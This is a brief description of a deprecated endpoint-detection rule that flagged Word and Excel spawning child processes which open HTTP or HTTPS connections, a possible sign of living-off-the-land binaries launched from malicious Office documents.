This rule has been deprecated and was designed to identify instances where Office applications—such as Word and Excel—spawn child processes that initiate network connections via HTTP or HTTPS. It utilized data from Endpoint Detection and Response (EDR) agents to monitor process creation events, explicitly looking for connections that indicate potential malicious activity. Such patterns can suggest the execution of living-off-the-land binaries (LOLBins) through compromised Office documents, potentially leading to unauthorized code execution and data theft. The analytic aimed to enhance security vigilance against such threats in organizational environments.